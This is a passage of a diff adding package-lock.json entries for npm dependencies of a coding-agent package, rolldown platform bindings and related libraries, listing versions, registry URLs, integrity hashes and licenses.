+			"dev": true,
+			"license": "MIT",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/node-domexception": {
+			"version": "1.0.0",
+			"resolved": "https://registry.npmjs.org/node-domexception/-/node-domexception-1.0.0.tgz",
+			"integrity": "sha512-/jKZoMpw0F8GRwl4/eLROPA3cfcXtLApP0QzLmUT/HuPCZWyB7IY9ZrMeKw2O/nFIqPQB3PVM9aYm0F312AXDQ==",
+			"deprecated": "Use your platform's native DOMException instead",
+			"dev": true,
+			"funding": [
+				{
+					"type": "github",
+					"url": "https://github.com/sponsors/jimmywarting"
+				},
+				{
+					"type": "github",
+					"url": "https://paypal.me/jimmywarting"
+				}
+			],
+			"license": "MIT",
+			"peer": true,
+			"engines": {
+				"node": ">=10.5.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/node-fetch": {
+			"version": "3.3.2",
+			"resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-3.3.2.tgz",
+			"integrity": "sha512-dRB78srN/l6gqWulah9SrxeYnxeddIG30+GOqK/9OlLVyLg3HPnr6SqOWTWOXKRwC2eGYCkZ59NNuSgvSrpgOA==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"data-uri-to-buffer": "^4.0.0",
+				"fetch-blob": "^3.1.4",
+				"formdata-polyfill": "^4.0.10"
+			},
+			"engines": {
+				"node": "^12.20.0 || ^14.13.1 || >=16.0.0"
+			},
+			"funding": {
+				"type": "opencollective",
+				"url": "https://opencollective.com/node-fetch"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/openai": {
+			"version": "6.26.0",
+			"resolved": "https://registry.npmjs.org/openai/-/openai-6.26.0.tgz",
+			"integrity": "sha512-zd23dbWTjiJ6sSAX6s0HrCZi41JwTA1bQVs0wLQPZ2/5o2gxOJA5wh7yOAUgwYybfhDXyhwlpeQf7Mlgx8EOCA==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"peer": true,
+			"bin": {
+				"openai": "bin/cli"
+			},
+			"peerDependencies": {
+				"ws": "^8.18.0",
+				"zod": "^3.25 || ^4.0"
+			},
+			"peerDependenciesMeta": {
+				"ws": {
+					"optional": true
+				},
+				"zod": {
+					"optional": true
+				}
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/p-retry": {
+			"version": "4.6.2",
+			"resolved": "https://registry.npmjs.org/p-retry/-/p-retry-4.6.2.tgz",
+			"integrity": "sha512-312Id396EbJdvRONlngUx0NydfrIQ5lsYu0znKVUzVvArzEIt08V1qhtyESbGVd1FGX7UKtiFp5uwKZdM8wIuQ==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"@types/retry": "0.12.0",
+				"retry": "^0.13.1"
+			},
+			"engines": {
+				"node": ">=8"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/p-retry/node_modules/@types/retry": {
+			"version": "0.12.0",
+			"resolved": "https://registry.npmjs.org/@types/retry/-/retry-0.12.0.tgz",
+			"integrity": "sha512-wWKOClTTiizcZhXnPY4wikVAwmdYHp8q6DmC+EJUzAMsycb7HB32Kh9RN4+0gExjmPmZSAQjgURXIGATPegAvA==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/partial-json": {
+			"version": "0.1.7",
+			"resolved": "https://registry.npmjs.org/partial-json/-/partial-json-0.1.7.tgz",
+			"integrity": "sha512-Njv/59hHaokb/hRUjce3Hdv12wd60MtM9Z5Olmn+nehe0QDAsRtRbJPvJ0Z91TusF0SuZRIvnM+S4l6EIP8leA==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/path-expression-matcher": {
+			"version": "1.5.0",
+			"resolved": "https://registry.npmjs.org/path-expression-matcher/-/path-expression-matcher-1.5.0.tgz",
+			"integrity": "sha512-cbrerZV+6rvdQrrD+iGMcZFEiiSrbv9Tfdkvnusy6y0x0GKBXREFg/Y65GhIfm0tnLntThhzCnfKwp1WRjeCyQ==",
+			"dev": true,
+			"funding": [
+				{
+					"type": "github",
+					"url": "https://github.com/sponsors/NaturalIntelligence"
+				}
+			],
+			"license": "MIT",
+			"peer": true,
+			"engines": {
+				"node": ">=14.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/path-key": {
+			"version": "3.1.1",
+			"resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz",
+			"integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"engines": {
+				"node": ">=8"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/path-scurry": {
+			"version": "2.0.2",
+			"resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-2.0.2.tgz",
+			"integrity": "sha512-3O/iVVsJAPsOnpwWIeD+d6z/7PmqApyQePUtCndjatj/9I5LylHvt5qluFaBT3I5h3r1ejfR056c+FCv+NnNXg==",
+			"dev": true,
+			"license": "BlueOak-1.0.0",
+			"peer": true,
+			"dependencies": {
+				"lru-cache": "^11.0.0",
+				"minipass": "^7.1.2"
+			},
+			"engines": {
+				"node": "18 || 20 || >=22"
+			},
+			"funding": {
+				"url": "https://github.com/sponsors/isaacs"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/proper-lockfile": {
+			"version": "4.1.2",
+			"resolved": "https://registry.npmjs.org/proper-lockfile/-/proper-lockfile-4.1.2.tgz",
+			"integrity": "sha512-TjNPblN4BwAWMXU8s9AEz4JmQxnD1NNL7bNOY/AKUzyamc379FWASUhc/K1pL2noVb+XmZKLL68cjzLsiOAMaA==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"graceful-fs": "^4.2.4",
+				"retry": "^0.12.0",
+				"signal-exit": "^3.0.2"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/proper-lockfile/node_modules/retry": {
+			"version": "0.12.0",
+			"resolved": "https://registry.npmjs.org/retry/-/retry-0.12.0.tgz",
+			"integrity": "sha512-9LkiTwjUh6rT555DtE9rTX+BKByPfrMzEAtnlEtdEwr3Nkffwiihqe2bWADg+OQRjt9gl6ICdmB/ZFDCGAtSow==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"engines": {
+				"node": ">= 4"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/protobufjs": {
+			"version": "7.6.5",
+			"resolved": "https://registry.npmjs.org/protobufjs/-/protobufjs-7.6.5.tgz",
+			"integrity": "sha512-/FPD0nUc9jH6rfFjji9IBqOz4pcSE3CsT1m7Ep6Mdb0LxSUMj8hgl6GomOvZzpNpAqqGaXA0P3VSrZLFzIhQrw==",
+			"dev": true,
+			"hasInstallScript": true,
+			"license": "BSD-3-Clause",
+			"peer": true,
+			"dependencies": {
+				"@protobufjs/aspromise": "^1.1.2",
+				"@protobufjs/base64": "^1.1.2",
+				"@protobufjs/codegen": "^2.0.5",
+				"@protobufjs/eventemitter": "^1.1.1",
+				"@protobufjs/fetch": "^1.1.1",
+				"@protobufjs/float": "^1.0.2",
+				"@protobufjs/path": "^1.1.2",
+				"@protobufjs/pool": "^1.1.0",
+				"@protobufjs/utf8": "^1.1.1",
+				"@types/node": ">=13.7.0",
+				"long": "^5.3.2"
+			},
+			"engines": {
+				"node": ">=12.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/retry": {
+			"version": "0.13.1",
+			"resolved": "https://registry.npmjs.org/retry/-/retry-0.13.1.tgz",
+			"integrity": "sha512-XQBQ3I8W1Cge0Seh+6gjj03LbmRFWuoszgK9ooCpwYIrhhoO80pfq4cUkU5DkknwfOfFteRwlZ56PYOGYyFWdg==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"engines": {
+				"node": ">= 4"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/safe-buffer": {
+			"version": "5.2.1",
+			"resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz",
+			"integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==",
+			"dev": true,
+			"funding": [
+				{
+					"type": "github",
+					"url": "https://github.com/sponsors/feross"
+				},
+				{
+					"type": "patreon",
+					"url": "https://www.patreon.com/feross"
+				},
+				{
+					"type": "consulting",
+					"url": "https://feross.org/support"
+				}
+			],
+			"license": "MIT",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/semver": {
+			"version": "7.8.0",
+			"resolved": "https://registry.npmjs.org/semver/-/semver-7.8.0.tgz",
+			"integrity": "sha512-AcM7dV/5ul4EekoQ29Agm5vri8JNqRyj39o0qpX6vDF2GZrtutZl5RwgD1XnZjiTAfncsJhMI48QQH3sN87YNA==",
+			"dev": true,
+			"license": "ISC",
+			"peer": true,
+			"bin": {
+				"semver": "bin/semver.js"
+			},
+			"engines": {
+				"node": ">=10"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/shebang-command": {
+			"version": "2.0.0",
+			"resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz",
+			"integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"dependencies": {
+				"shebang-regex": "^3.0.0"
+			},
+			"engines": {
+				"node": ">=8"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/shebang-regex": {
+			"version": "3.0.0",
+			"resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz",
+			"integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"engines": {
+				"node": ">=8"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/signal-exit": {
+			"version": "3.0.7",
+			"resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz",
+			"integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==",
+			"dev": true,
+			"license": "ISC",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/strnum": {
+			"version": "2.3.0",
+			"resolved": "https://registry.npmjs.org/strnum/-/strnum-2.3.0.tgz",
+			"integrity": "sha512-ums3KNd42PGyx5xaoVTO1mjU1bH3NpY4vsrVlnv9PNGqQj8wd7rJ6nEypLrJ7z5vxK5RP0yMLo6J/Gsm62DI5Q==",
+			"dev": true,
+			"funding": [
+				{
+					"type": "github",
+					"url": "https://github.com/sponsors/NaturalIntelligence"
+				}
+			],
+			"license": "MIT",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/ts-algebra": {
+			"version": "2.0.0",
+			"resolved": "https://registry.npmjs.org/ts-algebra/-/ts-algebra-2.0.0.tgz",
+			"integrity": "sha512-FPAhNPFMrkwz76P7cdjdmiShwMynZYN6SgOujD1urY4oNm80Ou9oMdmbR45LotcKOXoy7wSmHkRFE6Mxbrhefw==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/tslib": {
+			"version": "2.8.1",
+			"resolved": "https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz",
+			"integrity": "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==",
+			"dev": true,
+			"license": "0BSD",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/typebox": {
+			"version": "1.1.38",
+			"resolved": "https://registry.npmjs.org/typebox/-/typebox-1.1.38.tgz",
+			"integrity": "sha512-pZ0aQPmMmXoUvSbeuWf/Hzsc+avNw/Zd6VeE8CFgkVGWyuHPJvqeJJDeJqLve+K70LvjYIoleGcoJHPT17cWoA==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/undici": {
+			"version": "8.5.0",
+			"resolved": "https://registry.npmjs.org/undici/-/undici-8.5.0.tgz",
+			"integrity": "sha512-xamtWoB1EshgjpmlXd7GGm2VfdDtw1+rD8uhry8pSNW3If6S8E0m2T2+orSKeZXEn/aPJMviCpDBA65WJt8zhg==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"engines": {
+				"node": ">=22.19.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/undici-types": {
+			"version": "6.21.0",
+			"resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz",
+			"integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/web-streams-polyfill": {
+			"version": "3.3.3",
+			"resolved": "https://registry.npmjs.org/web-streams-polyfill/-/web-streams-polyfill-3.3.3.tgz",
+			"integrity": "sha512-d2JWLCivmZYTSIoge9MsgFCZrt571BikcWGYkjC1khllbTeDlGqZ2D8vD8E/lJa8WGWbb7Plm8/XJYV7IJHZZw==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"engines": {
+				"node": ">= 8"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/which": {
+			"version": "2.0.2",
+			"resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz",
+			"integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==",
+			"dev": true,
+			"license": "ISC",
+			"peer": true,
+			"dependencies": {
+				"isexe": "^2.0.0"
+			},
+			"bin": {
+				"node-which": "bin/node-which"
+			},
+			"engines": {
+				"node": ">= 8"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/ws": {
+			"version": "8.21.0",
+			"resolved": "https://registry.npmjs.org/ws/-/ws-8.21.0.tgz",
+			"integrity": "sha512-Vsp28b7DRcimFQvrqu2Wek3z1iYxDCWqHYB8Qsnk/S4RfaCQzPGPyBNuVjJV3cd6UiKtUtp6sNM77gWvzcCH+g==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"engines": {
+				"node": ">=10.0.0"
+			},
+			"peerDependencies": {
+				"bufferutil": "^4.0.1",
+				"utf-8-validate": ">=5.0.2"
+			},
+			"peerDependenciesMeta": {
+				"bufferutil": {
+					"optional": true
+				},
+				"utf-8-validate": {
+					"optional": true
+				}
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/xml-naming": {
+			"version": "0.1.0",
+			"resolved": "https://registry.npmjs.org/xml-naming/-/xml-naming-0.1.0.tgz",
+			"integrity": "sha512-k8KO9hrMyNk6tUWqUfkTEZbezRRpONVOzUTnc97VnCvyj6Tf9lyUR9EDAIeiVLv56jsMcoXEwjW8Kv5yPY52lw==",
+			"dev": true,
+			"funding": [
+				{
+					"type": "github",
+					"url": "https://github.com/sponsors/NaturalIntelligence"
+				}
+			],
+			"license": "MIT",
+			"peer": true,
+			"engines": {
+				"node": ">=16.0.0"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/yaml": {
+			"version": "2.9.0",
+			"resolved": "https://registry.npmjs.org/yaml/-/yaml-2.9.0.tgz",
+			"integrity": "sha512-2AvhNX3mb8zd6Zy7INTtSpl1F15HW6Wnqj0srWlkKLcpYl/gMIMJiyuGq2KeI2YFxUPjdlB+3Lc10seMLtL4cA==",
+			"dev": true,
+			"license": "ISC",
+			"peer": true,
+			"bin": {
+				"yaml": "bin.mjs"
+			},
+			"engines": {
+				"node": ">= 14.6"
+			},
+			"funding": {
+				"url": "https://github.com/sponsors/eemeli"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/zod": {
+			"version": "3.25.76",
+			"resolved": "https://registry.npmjs.org/zod/-/zod-3.25.76.tgz",
+			"integrity": "sha512-gzUt/qt81nXsFGKIFcC3YnfEAx5NkunCfnDlvuBSSFS02bcXu4Lmea0AFIUwbLWxWPx3d9p8S5QoaujKcNQxcQ==",
+			"dev": true,
+			"license": "MIT",
+			"peer": true,
+			"funding": {
+				"url": "https://github.com/sponsors/colinhacks"
+			}
+		},
+		"node_modules/@earendil-works/pi-coding-agent/node_modules/zod-to-json-schema": {
+			"version": "3.25.2",
+			"resolved": "https://registry.npmjs.org/zod-to-json-schema/-/zod-to-json-schema-3.25.2.tgz",
+			"integrity": "sha512-O/PgfnpT1xKSDeQYSCfRI5Gy3hPf91mKVDuYLUHZJMiDFptvP41MSnWofm8dnCm0256ZNfZIM7DSzuSMAFnjHA==",
+			"dev": true,
+			"license": "ISC",
+			"peer": true,
+			"peerDependencies": {
+				"zod": "^3.25.28 || ^4"
+			}
+		},
+		"node_modules/@emnapi/core": {
+			"version": "2.0.0-alpha.3",
+			"resolved": "https://registry.npmjs.org/@emnapi/core/-/core-2.0.0-alpha.3.tgz",
+			"integrity": "sha512-AZypUeJ/yByuxyS7BlSNRDOMLMlROYtjYdIAuBmJssVz1UJDSeYxLrdizhXCFYhedC5bqd/ASy8EuNXbVVXp9g==",
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"peer": true,
+			"dependencies": {
+				"@emnapi/wasi-threads": "2.0.1",
+				"tslib": "^2.4.0"
+			}
+		},
+		"node_modules/@emnapi/runtime": {
+			"version": "2.0.0-alpha.3",
+			"resolved": "https://registry.npmjs.org/@emnapi/runtime/-/runtime-2.0.0-alpha.3.tgz",
+			"integrity": "sha512-hFPAhMUjJD9BSyCANEISPOogeXC9Zo9ZQl7L6vKnaVsMkCtzznaW/naYypeyl0Gv5rYfWYsZbpixTMpjDJzQeA==",
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"peer": true,
+			"dependencies": {
+				"tslib": "^2.4.0"
+			}
+		},
+		"node_modules/@emnapi/wasi-threads": {
+			"version": "2.0.1",
+			"resolved": "https://registry.npmjs.org/@emnapi/wasi-threads/-/wasi-threads-2.0.1.tgz",
+			"integrity": "sha512-9DsSk+o5NBX0CCJT8s0EROGSGxjR/tKu6aBTaVyq+SjAEQH4XcdcRxPBRzsBLizTTJ49MJjF+jgu3qnO9GLQcQ==",
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"peer": true,
+			"dependencies": {
+				"tslib": "^2.4.0"
+			}
+		},
+		"node_modules/@jridgewell/sourcemap-codec": {
+			"version": "1.5.5",
+			"resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.5.5.tgz",
+			"integrity": "sha512-cYQ9310grqxueWbl+WuIUIaiUaDcj7WOq5fVhEljNVgRfOUhY9fy2zTvfoqWsnebh8Sl70VScFbICvJnLKB0Og==",
+			"dev": true,
+			"license": "MIT"
+		},
+		"node_modules/@kimchi-dev/kimchi-workflows": {
+			"version": "0.0.1-alpha.1",
+			"resolved": "https://registry.npmjs.org/@kimchi-dev/kimchi-workflows/-/kimchi-workflows-0.0.1-alpha.1.tgz",
+			"integrity": "sha512-MvkNI3LRJ/L9sk+gsg9MRqlUaAaELXPr42CDtO7jKXkRKZmhzVSL/cF04wDjLfyNlAwFZX0B9r9BF4fhHCheOQ==",
+			"dev": true,
+			"license": "Apache-2.0",
+			"dependencies": {
+				"jiti": "^2.7.0"
+			},
+			"engines": {
+				"node": ">=24"
+			},
+			"peerDependencies": {
+				"@earendil-works/pi-coding-agent": "*",
+				"typebox": "*"
+			}
+		},
+		"node_modules/@napi-rs/wasm-runtime": {
+			"version": "1.2.0",
+			"resolved": "https://registry.npmjs.org/@napi-rs/wasm-runtime/-/wasm-runtime-1.2.0.tgz",
+			"integrity": "sha512-kDoONqMa+VnZ4vvvu/ZUurpJ4gkZU57e7g69qpNgWhYcZFPUHZM2CEMKm+cG6ufDVALbjMvfmMjFVqaK7uEMnA==",
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"dependencies": {
+				"@tybys/wasm-util": "^0.10.3"
+			},
+			"engines": {
+				"node": "^20.19.0 || ^22.13.0 || >=23.5.0"
+			},
+			"funding": {
+				"type": "github",
+				"url": "https://github.com/sponsors/Brooooooklyn"
+			},
+			"peerDependencies": {
+				"@emnapi/core": "^2.0.0-alpha.3",
+				"@emnapi/runtime": "^2.0.0-alpha.3"
+			}
+		},
+		"node_modules/@oxc-project/types": {
+			"version": "0.139.0",
+			"resolved": "https://registry.npmjs.org/@oxc-project/types/-/types-0.139.0.tgz",
+			"integrity": "sha512-r9gHphtCs+1M7J0pw6Sn/hh/Wpa/iQrOOkrNAlVLF/gHq+/CJmHIWKKUUhdWjcD6CIa8idarspCsASiXCXvFUw==",
+			"dev": true,
+			"license": "MIT",
+			"funding": {
+				"url": "https://github.com/sponsors/Boshen"
+			}
+		},
+		"node_modules/@rolldown/binding-android-arm64": {
+			"version": "1.1.5",
+			"resolved": "https://registry.npmjs.org/@rolldown/binding-android-arm64/-/binding-android-arm64-1.1.5.tgz",
+			"integrity": "sha512-lZg8fqIv2v7FF237bwMgzGZEJvGL79/s5knJ/i6FmsGF4XXlzccZ4jb+TrFIxtSSxFtIpdsgrPZeMk1I9AFcyQ==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"android"
+			],
+			"engines": {
+				"node": "^20.19.0 || >=22.12.0"
+			}
+		},
+		"node_modules/@rolldown/binding-darwin-arm64": {
+			"version": "1.1.5",
+			"resolved": "https://registry.npmjs.org/@rolldown/binding-darwin-arm64/-/binding-darwin-arm64-1.1.5.tgz",
+			"integrity": "sha512-51Bnx9pNiMRKSUNtBfySkNJ9vMU9Hh3I1ozDd6gyPPYzaXCfnptUcEZxXGYFn+ul2dtcMUiqGR1Yai2K10uoTw==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"darwin"
+			],
+			"engines": {
+				"node": "^20.19.0 || >=22.12.0"
+			}
+		},
+		"node_modules/@rolldown/binding-darwin-x64": {
+			"version": "1.1.5",
+			"resolved": "https://registry.npmjs.org/@rolldown/binding-darwin-x64/-/binding-darwin-x64-1.1.5.tgz",
+			"integrity": "sha512-Tm+gbfC0aHu1tBA/JvKQh32S0K6YgCHkiAF4/W6xX0K0RmNuc94VeK419dJoE65R5aRxmo+noZQSWrAMF6yb6g==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"darwin"
+			],
+			"engines": {
+				"node": "^20.19.0 || >=22.12.0"
+			}
+		},
+		"node_modules/@rolldown/binding-freebsd-x64": {
+			"version": "1.1.5",
+			"resolved": "https://registry.npmjs.org/@rolldown/binding-freebsd-x64/-/binding-freebsd-x64-1.1.5.tgz",
+			"integrity": "sha512-JMzDKCCXq93YccG5gz3hvOs1oXRKAf0XYpfOS88e+wZrC8Iugj6j68867vrYZkvpDDpKn/KoKORThmchMpF6TA==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"freebsd"
+			],
+			"engines": {
+				"node": "^20.19.0 || >=22.12.0"
+			}
+		},
+		"node_modules/@rolldown/binding-linux-arm-gnueabihf": {
+			"version": "1.1.5",
+			"resolved": "https://registry.npmjs.org/@rolldown/binding-linux-arm-gnueabihf/-/binding-linux-arm-gnueabihf-1.1.5.tgz",
+			"integrity": "sha512-uML21j2K5TfPGutKxub+M+nLjZIrWjXQ5Grx4lCe/nimTj9B4L63zHpjXLl4y0L3mcm2htEQIb06oCG/szerNw==",
+			"cpu": [
+				"arm"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": "^20.19.0 || >=22.12.0"
+			}
+		},
+		"node_modules/@rolldown/binding-linux-arm64-gnu": {
+			"version": "1.1.5",
+			"resolved": "https://registry.npmjs.org/@rolldown/binding-linux-arm64-gnu/-/binding-linux-arm64-gnu-1.1.5.tgz",
+			"integrity": "sha512-navSiuTMogvnQoZoM/v+l3ZWo50/NTwSHSzheABx/RCnmUPaKwq9qSo4Br2OYRs21+Fz8uFqITZM3H4opOB0/Q==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": "^20.19.0 || >=22.12.0"
+			}
+		},
+		"node_modules/@rolldown/binding-linux-arm64-musl": {
+			"version": "1.1.5",
+			"resolved": "https://registry.npmjs.org/@rolldown/binding-linux-arm64-musl/-/binding-linux-arm64-musl-1.1.5.tgz",
+			"integrity": "sha512-lAryqH7IteztmCXQXk0etKj4wBQ7Gx5S6LjKhsgp9zb8I5bsuvU/2llH1hDQcjsFeqIsovMVN339/8pUDDBXxA==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": "^20.19.0 || >=22.12.0"
+			}
+		},
+		"node_modules/@rolldown/binding-linux-ppc64-gnu": {
+			"version": "1.1.5",
+			"resolved": "https://registry.npmjs.org/@rolldown/binding-linux-ppc64-gnu/-/binding-linux-ppc64-gnu-1.1.5.tgz",
+			"integrity": "sha512-fsK/sNBnxzBlL4O1JNrZakVQxPspqpED5dLtNsZS9oOKmtSpdNIzxH2kkol5HYTWJN47sE20ztMJPxfZ89qGOg==",
+			"cpu": [
+				"ppc64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": "^20.19.0 || >=22.12.0"
+			}
+		},
+		"node_modules/@rolldown/binding-linux-s390x-gnu": {
+			"version": "1.1.5",
+			"resolved": "https://registry.npmjs.org/@rolldown/binding-linux-s390x-gnu/-/binding-linux-s390x-gnu-1.1.5.tgz",
+			"integrity": "sha512-gLYb4BIadlfTOYT5gO503n8zQjXflgzpD0FcyKh0Mzx3rqCZKnHoJWV9xe1KXUJ5lx2JfcSHr/mhzS0PC/McAA==",
+			"cpu": [
+				"s390x"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": "^20.19.0 || >=22.12.0"
+			}
+		},
+		"node_modules/@rolldown/binding-linux-x64-gnu": {
+			"version": "1.1.5",
+			"resolved": "https://registry.npmjs.org/@rolldown/binding-linux-x64-gnu/-/binding-linux-x64-gnu-1.1.5.tgz",
+			"integrity": "sha512-FjcpEKUyJygHgs1o50VYNvkt5+7Le/VEdYt0AkRpkL33MnyQfwr8l5mXwMmfmTbyMPr5vJLC+8/Gd9gXnwU1QQ==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": "^20.19.0 || >=22.12.0"
+			}
+		},
+		"node_modules/@rolldown/binding-linux-x64-musl": {
+			"version": "1.1.5",
+			"resolved": "https://registry.npmjs.org/@rolldown/binding-linux-x64-musl/-/binding-linux-x64-musl-1.1.5.tgz",
+			"integrity": "sha512-Me+PfPI2TMeOQk0gYWfLQZtTktrmzbr8cDboqX83XKc7UrgAi55gF+2dUkWdxd19n55Essp2yeca+O9N5rBxHg==",
+			"cpu": [
+				"x64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"linux"
+			],
+			"engines": {
+				"node": "^20.19.0 || >=22.12.0"
+			}
+		},
+		"node_modules/@rolldown/binding-openharmony-arm64": {
+			"version": "1.1.5",
+			"resolved": "https://registry.npmjs.org/@rolldown/binding-openharmony-arm64/-/binding-openharmony-arm64-1.1.5.tgz",
+			"integrity": "sha512-yc5WrLzXks6zCQfn9Oxr8pORKyl/pF+QjHmW/Qx3qu0oyrrNC+y2JLTU1E2rcWYAmzlnqngWXHQjy51VzW70Vw==",
+			"cpu": [
+				"arm64"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"os": [
+				"openharmony"
+			],
+			"engines": {
+				"node": "^20.19.0 || >=22.12.0"
+			}
+		},
+		"node_modules/@rolldown/binding-wasm32-wasi": {
+			"version": "1.1.5",
+			"resolved": "https://registry.npmjs.org/@rolldown/binding-wasm32-wasi/-/binding-wasm32-wasi-1.1.5.tgz",
+			"integrity": "sha512-VbQGPX2b4r48TAMIM2cjgluIM1HYutm4pcTEJsle7iEP7sB1dFqtPLBVbdLAZCxy1txCcPxf4QFf4v8uvltPqA==",
+			"cpu": [
+				"wasm32"
+			],
+			"dev": true,
+			"license": "MIT",
+			"optional": true,
+			"dependencies": {
+				"@emnapi/core": "1.11.1",
+				"@emnapi/runtime": "1.11.1",
